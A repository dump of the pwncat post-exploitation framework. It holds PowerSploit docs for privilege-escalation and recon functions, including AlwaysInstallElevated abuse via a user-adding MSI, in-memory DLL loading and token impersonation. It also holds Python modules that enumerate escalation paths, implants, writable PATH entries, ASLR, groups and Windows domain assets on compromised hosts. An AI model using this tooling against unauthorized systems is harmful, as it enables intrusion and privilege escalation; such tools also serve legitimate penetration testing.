53 | Accept wildcard characters: False
54 | ```
55 |
56 | ## INPUTS
57 |
58 | ## OUTPUTS
59 |
60 | ### System.Management.ManagementObject
61 |
62 | ## NOTES
63 |
64 | ## RELATED LINKS
65 |
66 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Get-UnattendedInstallFile.md:
--------------------------------------------------------------------------------
1 | # Get-UnattendedInstallFile
2 |
3 | ## SYNOPSIS
4 | Checks several locations for remaining unattended installation files,
5 | which may have deployment credentials.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-UnattendedInstallFile
15 | ```
16 |
17 | ## DESCRIPTION
18 | Checks several well-known locations for unattended installation files left behind by deployment, which may contain deployment credentials, and returns any that are found.
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-UnattendedInstallFile
25 | ```
26 |
27 | Finds any remaining unattended installation files.
28 |
29 | ## PARAMETERS
30 |
31 | ## INPUTS
32 |
33 | ## OUTPUTS
34 |
35 | ### PowerUp.UnattendedInstallFile
36 |
37 | Custom PSObject containing results.
38 |
39 | ## NOTES
40 |
41 | ## RELATED LINKS
42 |
43 | [http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html)
44 |
45 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Get-UnquotedService.md:
--------------------------------------------------------------------------------
1 | # Get-UnquotedService
2 |
3 | ## SYNOPSIS
4 | Get-UnquotedService returns the name and binary path for services whose binary path is unquoted
5 | and contains a space.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: Get-ModifiablePath, Test-ServiceDaclPermission
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-UnquotedService
15 | ```
16 |
17 | ## DESCRIPTION
18 | Uses Get-WmiObject to query all win32_service objects and extract out
19 | the binary pathname for each.
20 | Then checks if any binary paths have a space
21 | and aren't quoted.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-UnquotedService
28 | ```
29 |
30 | Get a set of potentially exploitable services.
31 |
32 | ## PARAMETERS
33 |
34 | ## INPUTS
35 |
36 | ## OUTPUTS
37 |
38 | ### PowerUp.UnquotedService
39 |
40 | ## NOTES
41 |
42 | ## RELATED LINKS
43 |
44 | [https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb)
45 |
46 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Invoke-PrivescAudit.md:
--------------------------------------------------------------------------------
1 | # Invoke-PrivescAudit
2 |
3 | ## SYNOPSIS
4 | Executes all functions that check for various Windows privilege escalation opportunities.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Invoke-PrivescAudit [-HTMLReport]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Executes all functions that check for various Windows privilege escalation opportunities.
18 |
19 | ## EXAMPLES
20 |
21 | ### -------------------------- EXAMPLE 1 --------------------------
22 | ```
23 | Invoke-PrivescAudit
24 | ```
25 |
26 | Runs all escalation checks and outputs a status report for discovered issues.
27 |
28 | ### -------------------------- EXAMPLE 2 --------------------------
29 | ```
30 | Invoke-PrivescAudit -HTMLReport
31 | ```
32 |
33 | Runs all escalation checks and outputs a status report to SYSTEM.username.html
34 | detailing any discovered issues.
35 |
36 | ## PARAMETERS
37 |
38 | ### -HTMLReport
39 | Switch.
40 | Write a HTML version of the report to SYSTEM.username.html.
41 |
42 | ```yaml
43 | Type: SwitchParameter
44 | Parameter Sets: (All)
45 | Aliases:
46 |
47 | Required: False
48 | Position: Named
49 | Default value: False
50 | Accept pipeline input: False
51 | Accept wildcard characters: False
52 | ```
53 |
54 | ## INPUTS
55 |
56 | ## OUTPUTS
57 |
58 | ### System.String
59 |
60 | ## NOTES
61 |
62 | ## RELATED LINKS
63 |
64 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Privesc/Write-UserAddMSI.md:
--------------------------------------------------------------------------------
1 | # Write-UserAddMSI
2 |
3 | ## SYNOPSIS
4 | Writes out a precompiled MSI installer that prompts for a user/group addition.
5 | This function can be used to abuse the AlwaysInstallElevated policy that Get-RegistryAlwaysInstallElevated detects.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Write-UserAddMSI [[-Path] ]
15 | ```
16 |
17 | ## DESCRIPTION
18 | Writes out a precompiled MSI installer that prompts for a user/group addition.
19 | This function can be used to abuse the AlwaysInstallElevated policy that Get-RegistryAlwaysInstallElevated detects.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Write-UserAddMSI
26 | ```
27 |
28 | Writes the user add MSI to the local directory.
29 |
30 | ## PARAMETERS
31 |
32 | ### -Path
33 | Path to write the MSI to. Defaults to UserAdd.msi in the current directory.
34 |
35 | ```yaml
36 | Type: String
37 | Parameter Sets: (All)
38 | Aliases: ServiceName
39 |
40 | Required: False
41 | Position: 1
42 | Default value: UserAdd.msi
43 | Accept pipeline input: True (ByPropertyName, ByValue)
44 | Accept wildcard characters: False
45 | ```
46 |
47 | ## INPUTS
48 |
49 | ## OUTPUTS
50 |
51 | ### PowerUp.UserAddMSI
52 |
53 | ## NOTES
54 |
55 | ## RELATED LINKS
56 |
57 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Recon/Invoke-RevertToSelf.md:
--------------------------------------------------------------------------------
1 | # Invoke-RevertToSelf
2 |
3 | ## SYNOPSIS
4 | Reverts any token impersonation.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: PSReflect
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Invoke-RevertToSelf [[-TokenHandle] ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | This function uses RevertToSelf() to revert any impersonated tokens.
18 | If -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation),
19 | CloseHandle() is used to close the opened handle.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
26 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
27 | $Token = Invoke-UserImpersonation -Credential $Cred
28 | Invoke-RevertToSelf -TokenHandle $Token
29 | ```
30 |
31 | Impersonates the supplied user, then reverts the impersonation and closes the returned token handle.
31 |
32 | ## PARAMETERS
33 |
34 | ### -TokenHandle
35 | An optional IntPtr TokenHandle returned by Invoke-UserImpersonation.
36 |
37 | ```yaml
38 | Type: IntPtr
39 | Parameter Sets: (All)
40 | Aliases:
41 |
42 | Required: False
43 | Position: 1
44 | Default value: None
45 | Accept pipeline input: False
46 | Accept wildcard characters: False
47 | ```
48 |
49 | ## INPUTS
50 |
51 | ## OUTPUTS
52 |
53 | ## NOTES
54 |
55 | ## RELATED LINKS
56 |
57 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/Recon/Resolve-IPAddress.md:
--------------------------------------------------------------------------------
1 | # Resolve-IPAddress
2 |
3 | ## SYNOPSIS
4 | Resolves a given hostname to its associated IPv4 address.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Resolve-IPAddress [[-ComputerName] <String[]>]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Resolves a given hostname to its associated IPv4 address using
18 | \[Net.Dns\]::GetHostEntry().
19 | If no hostname is provided, the default
20 | is the IP address of the localhost.
21 |
22 | ## EXAMPLES
23 |
24 | ### -------------------------- EXAMPLE 1 --------------------------
25 | ```
26 | Resolve-IPAddress -ComputerName SERVER
27 | ```
28 |
29 | ### -------------------------- EXAMPLE 2 --------------------------
30 | ```
31 | @("SERVER1", "SERVER2") | Resolve-IPAddress
32 | ```
33 |
34 | ## PARAMETERS
35 |
36 | ### -ComputerName
37 | {{Fill ComputerName Description}}
38 |
39 | ```yaml
40 | Type: String[]
41 | Parameter Sets: (All)
42 | Aliases: HostName, dnshostname, name
43 |
44 | Required: False
45 | Position: 1
46 | Default value: $Env:COMPUTERNAME
47 | Accept pipeline input: True (ByPropertyName, ByValue)
48 | Accept wildcard characters: False
49 | ```
50 |
51 | ## INPUTS
52 |
53 | ### String
54 |
55 | Accepts one or more IP address strings on the pipeline.
56 |
57 | ## OUTPUTS
58 |
59 | ### System.Management.Automation.PSCustomObject
60 |
61 | A custom PSObject with the ComputerName and IPAddress.
62 |
63 | ## NOTES
64 |
65 | ## RELATED LINKS
66 |
67 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/docs/ScriptModification/Out-CompressedDll.md:
--------------------------------------------------------------------------------
1 | # Out-CompressedDll
2 |
3 | ## SYNOPSIS
4 | Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.
5 |
6 | PowerSploit Function: Out-CompressedDll
7 | Author: Matthew Graeber (@mattifestation)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 | Optional Dependencies: None
11 |
12 | ## SYNTAX
13 |
14 | ```
15 | Out-CompressedDll [-FilePath] <String>
16 | ```
17 |
18 | ## DESCRIPTION
19 | Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Out-CompressedDll -FilePath evil.dll
26 | ```
27 |
28 | Description
29 | -----------
30 | Compresses, base64 encodes, and outputs the code required to load evil.dll in memory.
31 |
32 | ## PARAMETERS
33 |
34 | ### -FilePath
35 | Specifies the path to a managed executable.
36 |
37 | ```yaml
38 | Type: String
39 | Parameter Sets: (All)
40 | Aliases:
41 |
42 | Required: True
43 | Position: 1
44 | Default value: None
45 | Accept pipeline input: False
46 | Accept wildcard characters: False
47 | ```
48 |
49 | ## INPUTS
50 |
51 | ## OUTPUTS
52 |
53 | ## NOTES
54 | Only pure MSIL-based dlls can be loaded using this technique.
55 | Native or IJW ('it just works' - mixed-mode) dlls will not load.
56 |
57 | ## RELATED LINKS
58 |
59 | [http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html](http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html)
60 |
61 |
--------------------------------------------------------------------------------
/pwncat/data/loader.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/data/loader.dll
--------------------------------------------------------------------------------
/pwncat/data/reports/linux.md:
--------------------------------------------------------------------------------
1 | {% extends "generic.md" %}
2 |
3 | {% block platform %}
4 | ## Linux Specific Info!
5 | {% endblock %}
6 |
--------------------------------------------------------------------------------
/pwncat/data/reports/windows.md:
--------------------------------------------------------------------------------
1 | {% extends "generic.md" %}
2 |
3 | {% block platform %}
4 | ## Windows Specific Info!
5 |
6 | {{ [["Hello", "World"], ["Goodbye", "World"]] | table(headers=True) }}
7 |
8 | {% endblock %}
9 |
--------------------------------------------------------------------------------
/pwncat/data/stagetwo.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/data/stagetwo.dll
--------------------------------------------------------------------------------
/pwncat/modules/agnostic/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/agnostic/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/agnostic/clean.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import pwncat
4 | from pwncat.modules import Status, BaseModule, ModuleFailed
5 |
6 |
class Module(BaseModule):
    """Clean up any modifications to the target. This mainly includes
    tampers saved in the database, but could include other changes added
    to future versions of pwncat."""

    PLATFORM = None

    def run(self, session: "pwncat.manager.Session"):
        """Walk every recorded tamper and revert the ones we are able to.

        A tamper is skipped, with a warning logged, when it is not marked
        revertable or when its ``uid`` differs from the session's current
        user id. A revert that raises ``ModuleFailed`` is logged and skipped
        as well. The database transaction is committed once every tamper
        has been visited.

        :param session: the session whose tampers should be reverted
        """

        me = session.current_user()

        def warn(tamper, reason):
            # All skip reasons share one log format
            session.log(f"[yellow]warning[/yellow]: {tamper.title(session)}: {reason}")

        for tamper in session.run("enumerate", types=["tamper"]):
            # Some tampers can never be undone
            if not tamper.revertable:
                warn(tamper, "not revertable")
                continue

            # Reverting under a uid other than the one that made the change
            # is refused
            if tamper.uid != me.id:
                warn(tamper, "incorrect uid to revert")
                continue

            try:
                yield Status(tamper.title(session))
                tamper.revert(session)
            except ModuleFailed as exc:
                warn(tamper, exc)

        session.db.transaction_manager.commit()
39 |
--------------------------------------------------------------------------------
/pwncat/modules/agnostic/enumerate/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | # Alias `run enumerate` to `run enumerate.gather`
4 | from pwncat.modules.agnostic.enumerate.gather import Module # noqa: F401
5 |
--------------------------------------------------------------------------------
/pwncat/modules/agnostic/enumerate/escalate/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/agnostic/enumerate/escalate/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/agnostic/enumerate/escalate/implant.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import pwncat
4 | from pwncat.facts import Implant, EscalationSpawn, EscalationReplace
5 | from pwncat.modules.enumerate import Schedule, EnumerateModule
6 |
7 |
class ImplantEscalationReplace(EscalationReplace):
    """Escalation method backed by an installed replace-style implant.

    The escalation source and target uid are copied from the implant and
    the ``source_uid`` slot is left ``None``; escalating delegates entirely
    to the implant.
    """

    def __init__(self, implant: Implant):
        super().__init__(implant.source, None, implant.uid)
        self.implant: Implant = implant

    def escalate(self, session: "pwncat.manager.Session"):
        """Run the wrapped implant's escalation and return its result."""
        return self.implant.escalate(session)

    def title(self, session: "pwncat.manager.Session"):
        """Label this method as ``implant: <implant title>``."""
        label = self.implant.title(session)
        return f"implant: {label}"
20 |
21 |
class ImplantEscalationSpawn(EscalationSpawn):
    """Escalation method backed by an installed spawn-style implant.

    Mirrors :class:`ImplantEscalationReplace`: source and target uid come
    from the implant, ``source_uid`` is ``None``, and escalation is handed
    to the implant itself.
    """

    def __init__(self, implant: Implant):
        super().__init__(implant.source, None, implant.uid)
        self.implant: Implant = implant

    def escalate(self, session: "pwncat.manager.Session"):
        """Run the wrapped implant's escalation and return its result."""
        return self.implant.escalate(session)

    def title(self, session: "pwncat.manager.Session"):
        """Label this method as ``implant: <implant title>``."""
        label = self.implant.title(session)
        return f"implant: {label}"
34 |
35 |
class Module(EnumerateModule):
    """Generates escalation methods based on installed implants in
    order to facilitate their usage during automated escalation."""

    PLATFORM = None
    SCHEDULE = Schedule.ALWAYS
    PROVIDES = ["escalate.replace", "escalate.spawn"]

    def enumerate(self, session):
        """Yield one escalation wrapper per installed implant.

        An implant advertising ``implant.replace`` becomes an
        :class:`ImplantEscalationReplace`; otherwise one advertising
        ``implant.spawn`` becomes an :class:`ImplantEscalationSpawn`. An
        implant carrying both types is wrapped as a replace method.
        """
        implants = session.run(
            "enumerate", types=["implant.replace", "implant.spawn"]
        )

        for implant in implants:
            wrapper = None
            if "implant.replace" in implant.types:
                wrapper = ImplantEscalationReplace
            elif "implant.spawn" in implant.types:
                wrapper = ImplantEscalationSpawn

            if wrapper is not None:
                yield wrapper(implant)
53 |
--------------------------------------------------------------------------------
/pwncat/modules/agnostic/enumerate/escalate/replace.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import pwncat
4 | from pwncat.facts import ExecuteAbility, EscalationReplace
5 | from pwncat.modules.enumerate import Schedule, EnumerateModule
6 |
7 |
class DirectReplaceAbility(EscalationReplace):
    """Escalation method that turns an execute ability into a user replacement.

    ``source_uid`` and ``uid`` are taken from the ability; escalating opens
    the shell the ability provides.
    """

    def __init__(self, source, ability: ExecuteAbility):
        super().__init__(source, ability.source_uid, ability.uid)
        self.ability: ExecuteAbility = ability

    def escalate(self, session: "pwncat.manager.Session"):
        """Spawn the shell provided by the underlying ability."""
        return self.ability.shell(session)

    def title(self, session: "pwncat.manager.Session"):
        """Reuse the ability's own title."""
        return self.ability.title(session)
20 |
21 |
class Module(EnumerateModule):
    """Locate execute abilities and produce escalation methods from them.
    This module produces EscalationReplace results which replace the active
    user in the running session with the new user."""

    PLATFORM = None
    SCHEDULE = Schedule.ALWAYS
    PROVIDES = ["escalate.replace"]

    def enumerate(self, session: "pwncat.manager.Session"):
        """Wrap every ``ability.execute`` fact in a :class:`DirectReplaceAbility`."""
        abilities = session.run("enumerate", types=["ability.execute"])
        yield from (DirectReplaceAbility(self.name, ability) for ability in abilities)
35 |
--------------------------------------------------------------------------------
/pwncat/modules/linux/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/linux/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/linux/enumerate/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/linux/enumerate/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/linux/enumerate/escalate/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/linux/enumerate/escalate/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/linux/enumerate/escalate/write_authorized_keys.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/linux/enumerate/escalate/write_authorized_keys.py
--------------------------------------------------------------------------------
/pwncat/modules/linux/enumerate/file/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/linux/enumerate/file/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/linux/enumerate/misc/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/linux/enumerate/misc/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/linux/enumerate/misc/writable_path.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import rich.markup
4 |
5 | from pwncat.db import Fact
6 | from pwncat.platform.linux import Linux
7 | from pwncat.modules.enumerate import Schedule, EnumerateModule
8 |
9 |
class WritablePath(Fact):
    """Fact naming a PATH directory the current user can write to."""

    def __init__(self, source, path):
        super().__init__(source=source, types=["misc.writable_path"])
        # Resolved directory path as a plain string
        self.path: str = path

    def title(self, session):
        """The path, escaped so it renders literally in rich output."""
        return rich.markup.escape(self.path)
18 |
19 |
class Module(EnumerateModule):
    """
    Locate any components of the current PATH that are writable
    by the current user.
    """

    # NOTE(review): PROVIDES advertises "system.writable_path" while the
    # WritablePath facts are typed "misc.writable_path"; one of the two looks
    # wrong -- confirm which name consumers query before changing either.
    PROVIDES = ["system.writable_path"]
    SCHEDULE = Schedule.PER_USER
    PLATFORM = [Linux]

    def enumerate(self, session):
        """Yield a :class:`WritablePath` for every writable PATH entry.

        Each ``PATH`` component is walked upward to the first ancestor that
        exists on the target; if that ancestor is a directory the current
        user can write to, its resolved path is reported. Empty components
        are ignored.
        """
        components = session.platform.getenv("PATH").split(":")

        for component in components:
            # Empty entries (e.g. a trailing ':') name no directory
            if not component:
                continue

            # Climb to the first ancestor that exists on the target
            candidate = session.platform.Path(component)
            while not candidate.exists():
                candidate = candidate.parent

            if candidate.is_dir() and candidate.writable():
                yield WritablePath(self.name, str(candidate.resolve()))
46 |
--------------------------------------------------------------------------------
/pwncat/modules/linux/enumerate/software/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/linux/enumerate/software/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/linux/enumerate/software/sudo/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/linux/enumerate/software/sudo/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/linux/enumerate/system/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/linux/enumerate/system/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/linux/enumerate/system/aslr.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | from pwncat.db import Fact
4 | from pwncat.platform.linux import Linux
5 | from pwncat.modules.enumerate import EnumerateModule
6 |
7 |
class ASLRStateData(Fact):
    """Fact recording the kernel's ASLR setting."""

    def __init__(self, source, state):
        super().__init__(source=source, types=["system.aslr"])
        # Integer read from /proc/sys/kernel/randomize_va_space
        self.state: int = state

    def title(self, session):
        """Report 0 as disabled and any other value as enabled."""
        disabled = self.state == 0
        return "[green]disabled[/green]" if disabled else "[red]enabled[/red]"
19 |
20 |
class Module(EnumerateModule):
    """
    Determine whether or not ASLR is enabled or disabled.
    """

    PROVIDES = ["system.aslr"]
    PLATFORM = [Linux]

    def enumerate(self, session):
        """Read randomize_va_space and yield one :class:`ASLRStateData`.

        Nothing is yielded when the file is missing or unreadable, or when
        its contents do not parse as an integer.
        """
        sysctl = "/proc/sys/kernel/randomize_va_space"

        try:
            with session.platform.open(sysctl, "r") as filp:
                try:
                    state = int(filp.read())
                except ValueError:
                    # Unexpected contents: report nothing rather than guess
                    return

                yield ASLRStateData(self.name, state)
        except (FileNotFoundError, PermissionError):
            # Not present, or not readable from this account
            return
46 |
--------------------------------------------------------------------------------
/pwncat/modules/linux/enumerate/user/group.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import pwncat
4 | from pwncat.modules import Status, ModuleFailed
5 | from pwncat.facts.linux import LinuxGroup
6 | from pwncat.platform.linux import Linux
7 | from pwncat.modules.enumerate import Schedule, EnumerateModule
8 |
9 |
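class Module(EnumerateModule):
    """Enumerate groups from a linux target by parsing /etc/group"""

    PROVIDES = ["group"]
    PLATFORM = [Linux]
    SCHEDULE = Schedule.ONCE

    def enumerate(self, session: "pwncat.manager.Session"):
        """Yield a :class:`LinuxGroup` for every well-formed line of /etc/group.

        Group membership is the explicit member list from the file plus every
        enumerated user whose primary gid is that group. Lines that do not
        split into the four expected fields, or whose gid is not numeric, are
        skipped. A ``Status`` is yielded per parsed group before the group
        facts themselves are yielded.

        :param session: the session to enumerate
        :raises ModuleFailed: when /etc/group cannot be opened
        """

        # Index enumerated users by primary gid. Several users may share a
        # primary group, so keep a list of names per gid rather than a single
        # user (a single-user mapping silently dropped all but the last one).
        primary_members = {}
        for user in session.run("enumerate", types=["user"]):
            primary_members.setdefault(user.gid, []).append(user.name)

        group_file = session.platform.Path("/etc/group")
        groups = []

        try:
            with group_file.open("r") as filp:
                for group_line in filp:
                    try:
                        # name:password:gid:member,member,...
                        (group_name, password, gid, members) = group_line.split(":")
                        gid = int(gid)
                        members = [m.strip() for m in members.split(",") if m.strip()]

                        # Users whose primary group this is count as members
                        # too; avoid duplicating names already listed
                        for name in primary_members.get(gid, []):
                            if name not in members:
                                members.append(name)

                        groups.append(
                            LinuxGroup(self.name, group_name, password, gid, members)
                        )

                        yield Status(group_name)

                    except (KeyError, ValueError, IndexError):
                        # Malformed line: wrong field count or non-numeric gid
                        continue

            yield from groups

        except (FileNotFoundError, PermissionError) as exc:
            raise ModuleFailed(str(exc)) from exc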
52 |
--------------------------------------------------------------------------------
/pwncat/modules/linux/implant/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/linux/implant/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/windows/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/windows/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/windows/enumerate/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/domain/fileserver.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import pwncat
4 | from pwncat.modules import Status
5 | from pwncat.platform.windows import Windows, PowershellError
6 | from pwncat.modules.enumerate import Schedule, EnumerateModule
7 |
8 |
class Module(EnumerateModule):
    """Identify the domain computers that PowerView reports as file servers"""

    PLATFORM = [Windows]
    PROVIDES = ["domain.fileserver"]
    SCHEDULE = Schedule.ONCE

    def enumerate(self, session: "pwncat.manager.Session"):
        """Yield the domain computer facts whose name matches a file server.

        Requires a domain-joined target; the PowerSploit recon group is
        loaded and ``Get-DomainFileServer`` queried. If the query fails or
        returns nothing usable, enumeration ends with no results.
        """

        # Nothing to do off-domain
        if not session.run("enumerate", types=["domain.details"]):
            return

        yield Status("loading powersploit recon")
        session.run("powersploit", group="recon")

        try:
            yield Status("requesting domain file servers")
            servers = session.platform.powershell("Get-DomainFileServer")[0]
        except (IndexError, PowershellError):
            return

        # A single server is returned bare rather than in a list
        if not isinstance(servers, list):
            servers = [servers]

        # Case-insensitive match against the computer names
        wanted = {server.lower() for server in servers}

        for computer in session.run("enumerate.domain.computer"):
            if computer["name"].lower() in wanted:
                yield computer
41 |
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/domain/site.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | from typing import Dict
3 |
4 | import pwncat
5 | from pwncat.db import Fact
6 | from pwncat.modules import Status
7 | from pwncat.platform.windows import Windows, PowershellError
8 | from pwncat.modules.enumerate import Schedule, EnumerateModule
9 |
10 |
class SiteObject(Fact):
    """Fact wrapping one raw ``Get-DomainSite`` record."""

    def __init__(self, source: str, data: Dict):
        super().__init__(source=source, types=["domain.site"])
        # Record kept as returned; properties are read through __getitem__
        self.site = data

    def __getitem__(self, name: str):
        """Look up a property of the underlying site record."""
        return self.site[name]

    def title(self, session: "pwncat.manager.Session"):
        """Render the site's distinguished name."""
        # NOTE(review): unlike the other Windows facts, the DN is not passed
        # through rich.markup.escape, so square brackets in a DN would be
        # interpreted as rich markup.
        dn = self["distinguishedname"]
        return f"[cyan]{dn}[/cyan]"
24 |
25 |
class Module(EnumerateModule):
    """Retrieve information on all domain sites"""

    PLATFORM = [Windows]
    PROVIDES = ["domain.site"]
    SCHEDULE = Schedule.ONCE

    def enumerate(self, session: "pwncat.manager.Session"):
        """Yield a :class:`SiteObject` per site returned by ``Get-DomainSite``.

        Ends silently when the target is not domain-joined or the query
        fails. A lone site comes back as a dict and is wrapped on its own;
        otherwise the result is iterated.
        """

        if not session.run("enumerate", types=["domain.details"]):
            return

        yield Status("loading powersploit recon")
        session.run("powersploit", group="recon")

        try:
            yield Status("requesting domain sites")
            sites = session.platform.powershell("Get-DomainSite")[0]
        except (IndexError, PowershellError):
            # Doesn't appear to be a domain joined site
            return

        records = [sites] if isinstance(sites, dict) else sites
        for record in records:
            yield SiteObject(self.name, record)
55 |
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/network/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/pwncat/modules/windows/enumerate/network/__init__.py
--------------------------------------------------------------------------------
/pwncat/modules/windows/enumerate/protections/antivirus.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 |
4 | import rich.markup
5 |
6 | import pwncat
7 | from pwncat.db import Fact
8 | from pwncat.platform.windows import Windows
9 | from pwncat.modules.enumerate import EnumerateModule
10 |
11 | """
12 | TODO: This should use csvreader.
13 | """
14 |
15 |
class MountedDrive(Fact):
    """Fact describing an antivirus product registered in SecurityCenter2.

    NOTE(review): the class name is historical and misleading; it describes
    an antivirus product (name and reporting executable), not a drive.
    """

    def __init__(self, source, av_name: str, exe_path: str):
        super().__init__(source=source, types=["protection.antivirus"])
        self.av_name: str = av_name
        self.exe_path: str = exe_path

    def title(self, session):
        """Product name and executable path, both escaped for rich markup."""
        name = rich.markup.escape(self.av_name)
        path = rich.markup.escape(self.exe_path)
        return f"Antivirus [red]{name}[/red] running from [yellow]{path}[/yellow]"
25 |
26 |
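class Module(EnumerateModule):
    """Enumerate antivirus products registered in the SecurityCenter2 WMI namespace"""

    PROVIDES = ["protection.antivirus"]
    PLATFORM = [Windows]

    def enumerate(self, session):
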